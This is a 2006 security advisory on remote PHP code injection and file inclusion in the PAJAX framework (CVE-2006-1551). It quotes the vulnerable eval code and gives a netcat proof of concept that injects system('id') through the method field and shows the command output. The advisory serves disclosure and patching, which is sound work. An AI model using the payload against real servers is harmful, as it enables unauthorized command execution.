pajax-0.5.1.txt

`Advisory: PAJAX Remote Code Injection and File Inclusion Vulnerability  
  
RedTeam has identified two security flaws in PAJAX.  
It is possible to execute arbitrary PHP code from unchecked user  
input. Additionally, it is possible to include arbitrary files on the  
server ending in ".class.php".  
  
  
Details  
=======  
  
Product: PAJAX  
Affected Versions: All versions up to pajax-0.5.1  
Fixed Versions: pajax-0.5.2  
Vulnerability Type: Remote code injection, arbitrary file inclusion  
Security-Risk: high  
Vendor-URL: http://www.auberger.com/pajax/3/  
Vendor-Status: informed, fixed  
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.txt  
Advisory-Status: public  
CVE: CVE-2006-1551  
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551  
  
  
Introduction  
============  
  
PAJAX is an AJAX framework which allows simple PHP objects to be made  
remotely callable from within JavaScript, using XMLHttpRequest. PAJAX  
utilizes an ORB (Object Request Broker) pattern allowing JavaScript  
objects to call methods of remote PHP objects via some remote interface.  
PAJAX is developed by Georges Auberger.  
  
  
More Details  
============  
  
By using PAJAX it is possible to write web applications that utilize PHP  
classes running on a remote server to perform operations. PAJAX is able  
to create a remote JavaScript interface object and a stub on the server  
for some PHP class. The JavaScript interface communicates with the stub  
on the server, which invokes the called methods on the remote object. To  
invoke methods on an object PHP's eval function is used.  
  
/pajax/pajax_call_dispatcher.php contains the following code:  
  
// Invoking the method with args  
eval("\$ret = \$obj->$method(".$args.");");   
  
The $method and $args parameters consist of unchecked POST variables,  
which may contain harmful PHP code.  
  
Additionally a file is included for each specified classname. The  
included file consists of predefined paths and the user supplied  
variable $className:  
  
function loadClass($className) {  
$paths = split(CLASS_PATH_DELIMITER, $this->classPath);  
foreach ($paths as $path) {  
$classPath = $path . "/" . $className . ".class.php";  
[...]  
  
This variable is not validated and thus allows directory traversal  
attacks.  
  
  
Proof of Concept  
================  
  
[s@host ~]$ nc www.example.com 80  
POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Content-Type: text/json  
Content-length: 137  
Host: www.example.com  
  
{"id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "Calculator",   
"method": "add(1,1);system("id");$obj->add", "params": ["1", "5"]}  
HTTP/1.1 200 OK  
Date: Thu, 30 Mar 2006 14:21:08 GMT  
Server: Apache  
X-Powered-By: PHP/4.4.2  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,   
pre-check=0  
Pragma: no-cache  
Transfer-Encoding: chunked  
Content-Type: text/html  
  
27  
uid=80(www) gid=80(www) groups=80(www)  
[...]  
  
  
Workaround  
==========  
  
No workaround is known at this time.  
  
Fix  
===  
  
Users of PAJAX should upgrade to the latest version pajax-0.5.2 [1].  
  
  
Security Risk  
=============  
  
RedTeam considers the security risk high, because arbitrary code can  
be executed on the webserver.  
  
  
History  
=======  
  
2006-30-03 Discovery of the problem  
2006-30-03 Notification of the author  
2006-30-03 Initial response from the author  
2006-12-04 A fixed version of PAJAX is available  
2006-13-04 Public release  
  
  
References  
==========  
  
[1] http://www.auberger.com/pajax/3/  
  
  
RedTeam  
=======  
  
RedTeam offers interested business parties penetration tests to validate  
their security. Doing security research RedTeam likes to enhance the  
common knowledgebase in security related areas. More information about  
RedTeam can be found at http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting Tel.: +49-(0)241-963 1300  
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304  
52068 Aachen http://www.redteam-pentesting.de  
`